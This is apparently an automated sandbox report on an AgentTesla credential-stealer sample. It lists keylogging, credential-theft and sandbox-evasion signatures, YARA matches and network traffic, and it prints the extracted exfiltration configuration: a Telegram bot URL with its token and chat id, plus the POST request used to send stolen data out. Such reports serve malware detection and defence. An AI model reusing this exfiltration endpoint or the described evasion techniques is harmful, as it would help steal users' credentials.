Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
Analysis ID:620228
MD5:5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
SHA1:1a115c8a1761ef2a2cf61d854d1d2c201c902d53
SHA256:31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ykVBUY.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ykVBUY.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              9.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                9.2.MSBuild.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
                • 0x32e84:$s10: logins
                • 0x328eb:$s11: credential
                • 0x2ed14:$g1: get_Clipboard
                • 0x2ed22:$g2: get_Keyboard
                • 0x2ed2f:$g3: get_Password
                • 0x300eb:$g4: get_CtrlKeyDown
                • 0x300fb:$g5: get_ShiftKeyDown
                • 0x3010c:$g6: get_AltKeyDown
                9.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  9.0.MSBuild.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    Click to see the 25 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 9.0.MSBuild.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.6260.0.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
                    Multi AV Scanner detection for submitted file
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeReversingLabs: Detection: 26%
                    Machine Learning detection for sample
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeJoe Sandbox ML: detected
                    Source: 9.0.MSBuild.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: 9.0.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
                    Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

                    Networking

                    barindex
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560cHost: api.telegram.orgContent-Length: 754Expect: 100-continueConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 8.248.119.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.4
                    Source: unknownTCP traffic detected without corresponding DNS query: 67.26.81.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 67.26.81.254
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 13.248.245.213
                    Source: unknownTCP traffic detected without corresponding DNS query: 142.250.203.110
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://UhwhaG.com
                    Source: MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----
                    Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                    Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                    Source: unknownHTTP traffic detected: POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560cHost: api.telegram.orgContent-Length: 754Expect: 100-continueConnection: Keep-Alive
                    Source: unknownDNS traffic detected: queries for: api.telegram.org
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Installs a global keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                    Contains functionality to register a low level keyboard hook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0687B0F8 SetWindowsHookExW 0000000D,00000000,?,?9_2_0687B0F8
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Modifies the hosts file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: 9.0.MSBuild.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325C3440_2_0325C344
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeCode function: 0_2_0325E7600_2_0325E760
